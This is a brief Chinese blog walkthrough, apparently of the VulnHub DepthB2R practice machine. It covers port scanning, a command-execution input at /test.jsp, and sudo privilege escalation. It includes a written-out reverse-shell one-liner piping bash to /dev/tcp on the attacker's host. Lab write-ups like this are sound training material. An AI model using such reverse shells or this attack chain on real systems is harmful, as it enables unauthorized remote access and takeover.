DepthB2R靶机

最新推荐文章于 2024-09-09 17:43:45 发布
最新推荐文章于 2024-09-09 17:43:45 发布
阅读量163 收藏
点赞数 3
文章标签: 开发语言 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65285254/article/details/140910347
版权

vmware打开 查看MAC地址

端口扫描

靶机ip地址为192.168.153.134

查看开放端口

nmap -p- -A 192.168.153.134

目录扫描

拼接访问 /test.jsp

发现一个输入框

经过尝试 发现存在rce漏洞

查看 /home下的用户 发现有bill用户

尝试进行反弹shell

ssh bill@localhost bash -i >& /dev/tcp/192.168.153.133/9999 0>&1

发现失败,感觉像是ssh服务被关闭

尝试关闭防火墙

kali监听9999端口 再次反弹shell

尝试sudo提权

sudo -l

sudo su

m0_65285254
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
depthb2r靶机
weixin_73074638的博客
08-06 159
访问robots.txt,得知该目标为 apche /tomact 8.0.38 ubuntu操作系统上网查找nday,未发现可利用的。执行ls -l/tmp。访问test.jsp。
VulnHub DepthB2R 靶机渗透
Shadow的博客
04-08 380
DepthB2R 靶机渗透 目标:得到root权限 作者:shadow 时间:2021-04-08 请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。 一、信息收集 主机ip为172.16.1.22 nmap -p- -A -T5 172.16.1.22 只开放了8080端口,我们看看是什么 二、web渗透 没什么发现,试试nikto扫描下 ni
DepthB2R靶机复现
weixin_52956666的博客
08-02 280
访问192.168.112.149:8080。靶机IP为192.168.112.149。输入ls -l /home查看用户。发现失败,感觉像是ssh服务被关闭。这个靶机比较友好,不需要进行设置。输入ls -l发现存在命令执行。sudo -l查看免密操作。拼接/test.jsp。尝试进行反弹shell。sudo su直接提权。在kali上开启监听。
DepthB2R靶机渗透测试
weixin_58786230的博客
08-03 243
【代码】DepthB2R靶机渗透测试。
vulnhub系列:DepthB2R
jq_j37的博客
08-03 301
vulnhub系列:DepthB2R靶机,打靶文章
DepthB2R【附代码】(权限提升)
weixin_52487093的博客
08-05 287
BREACH: 2.1【附代码】(权限提升)
【vulnhub】Depth靶机
wbplife的博客
08-02 371
输入ps aux,找出带有 “ps aux”的正在运行的进程,选项“ aux ”会打印系统中所有正在运行的进程。我们发现 sshd 服务正在使用中,但访问可能受到限制,nmap刚刚没有扫描出ssh的端口,可能存在防火墙。ls -l /home 查看到home目录内容,发现bill用户。存在系统命令执行漏洞,进行利用,反弹shell尝试失败。提示我们输入 ls -l /tmp 测试一下。,发现所有用户(ALL)都有sudo权限,运行环境:VMware运行该虚拟机。有一个目录/test.jsp。
Vulnhub靶机 Depth(渗透测试)
2301_78721909的博客
07-29 349
Vulnhub靶机 Depth(from wuhu)
【vulnhub靶场】Depth:1靶机提权
qq_46421742的博客
07-28 268
免责声明:本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。
安装部署Web安全测试用的靶机
11-24
为了进行有效的测试,我们需要模拟真实的环境,这就是靶机的作用。本实验旨在通过安装部署Web安全测试靶机,包括DVWA、MCIR、Pikachu、mutillidae和BWAPP,来提供一个安全学习和实践的平台。 首先,安装XAMPP,这是...
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
OWASP靶机安全学习、测试
05-24
这里提供的是owasp靶机的下载,下载后直接在虚拟机导入即可使用 OWASP靶机是一个开放式Web应用程序安全项目组织,旨在帮助计算机和互联网应用程序提供公正、实际、有成本效益的信息。在信息安全中OWASP TOP 10 是...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
一个php快速项目搭建框架源码,带一键CURD等功能
jiyc2008的博客
08-26 6680
框架易于功能扩展,代码维护,方便二次开发,帮助开发者简单高效降低二次开发成本,满足专注业务深度开发的需求。百度网盘下载。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8454
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
【JAVA】Tomcat性能优化、安全配置、资源控制以及运行模式超详细
A的博客
09-09 1425
nio(new I/O),是Java SE 1.4及后续版本提供的一种新的I/O操作方式(即java.nio包及其子包)。Java nio是一个基于缓冲区、并能提供非阻塞I/O操作的Java API,因此nio也被看成是non-blocking I/O的缩写。
网站安全需求分析与安全保护工程
最新发布
weixin_49171105的博客
09-09 423
网站:是基于B/S技术架构的综合信息服务平台,主要提供网页信息及业务后台对外接口服务。
Windows2008服务器上搭建五种靶机教程
"该资源是一份关于如何搭建五种不同靶机的教程,由张学飞撰写,主要针对Windows 2008服务器环境。涉及的靶机包括DVWA(Damn Vulnerable Web Application)、MCIR、Pikachu、mutillidae以及bWAPP。这些靶机主要用于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值